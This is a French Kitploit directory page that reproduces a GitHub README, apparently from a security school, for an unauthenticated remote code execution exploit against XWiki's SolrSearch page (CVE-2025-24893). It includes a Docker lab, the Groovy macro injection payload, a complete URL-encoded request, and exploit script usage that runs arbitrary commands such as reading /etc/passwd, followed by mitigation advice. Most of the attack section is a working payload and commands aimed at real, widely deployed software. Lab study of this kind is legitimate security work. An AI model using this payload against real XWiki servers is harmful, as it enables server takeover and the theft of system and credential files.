Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xwiki-cve-2025-24893 — Exploit d'exécution de code à distance non authentifié pour XWiki SolrSearch (CVE-2025-24893) via injection Groovy dans le paramètre text, avec environnement de laboratoire basé sur Docker et script PoC. | Kitploit
Outils/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

Exploit d'exécution de code à distance non authentifié pour XWiki SolrSearch (CVE-2025-24893) via injection Groovy dans le paramètre text, avec environnement de laboratoire basé sur Docker et script PoC.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 moisPas encore vérifié

XWiki SolrSearch RCE non authentifiée (CVE-2025-24893)


Contributeurs

  • École Whitehat 4e promotion, classe 25 Im Duyeon(@endusdksla)

Résumé

  • XWiki interprète et rend la syntaxe wiki et les macros côté serveur. Le problème est que la page Main.SolrSearch est ouverte aux invités tout en évaluant le paramètre text, saisi par l'utilisateur, comme syntaxe XWiki sans validation suffisante.
  • Un attaquant peut insérer la macro {{groovy}} dans text pour exécuter du code Groovy arbitraire sur le serveur, et même invoquer des commandes système via "command".execute(). Cette vulnérabilité peut être exploitée par une simple requête GET, sans connexion ni token.

Configuration de l'environnement

Ce répertoire configure un environnement vulnérable en utilisant la distribution standalone officielle XWiki 15.10.1 et l'environnement d'exécution Java 17.

Conditions de vulnérabilité

  • La version de XWiki doit être antérieure à la version corrigée.
  • Le point d'accès Main.SolrSearch doit être accessible aux invités.
  • Le serveur doit pouvoir évaluer le paramètre text comme syntaxe XWiki.
  • La macro groovy doit être activée (exécutable).

Cet environnement utilise XWiki 15.10.1, donc il satisfait les conditions ci-dessus.

Procédure de reproduction

root@kitploit:~
docker compose up -d --build

Lors de la première exécution, l'installation automatique a lieu, cela peut prendre quelques minutes (environ 6 à 7 minutes).

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

Lorsque le résultat de la commande ci-dessus affiche "Status":"healthy", la configuration de l'environnement est terminée et l'exploitation est possible.

root@kitploit:~
pip install requests

Installe les dépendances avant d'exécuter exploit.py.

Code PoC

Le payload principal est le suivant :

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

Le payload ci-dessus est inséré dans le paramètre text et évalué sur la page Main.SolrSearch. En conséquence, println("id".execute().text) est exécuté sur le serveur, et le résultat de la commande est reflété dans le corps de la réponse RSS.

Le script complet est disponible dans exploit.py.

root@kitploit:~
python3 exploit.py

L'exécution du script Python ci-dessus permet de reproduire le PoC. La commande par défaut est id.

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

Pour exécuter une autre commande, passez un argument comme ci-dessus.

Ou bien envoyez une requête à l'URL suivante (payload qui affiche id) :

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Résultats d'exécution

poc_id Capture montrant la réponse avec id

poc_ls Vérification des fichiers du répertoire courant

Mesures de mitigation

  • Mettre à jour XWiki vers la version 15.10.11 ou supérieure, ou 16.4.1 ou supérieure.
  • Vérifier la politique d'accès invité pour les instances XWiki exposées publiquement.
  • Réduire au minimum les droits d'exécution des scripts/macros inutiles.
  • Surveiller les requêtes suspectes et les logs d'accès à SolrSearch.

Références

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
Télécharger l’outil
ÉlémentContenu
CVECVE-2025-24893
ProduitXWiki Platform
Versions vulnérables>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
Versions corrigées15.10.11, 16.4.1
Type de vulnérabilitéInjection d'évaluation -> RCE non authentifiée
Authentification requiseNon requise
ImpactExécution de commandes sur le serveur possible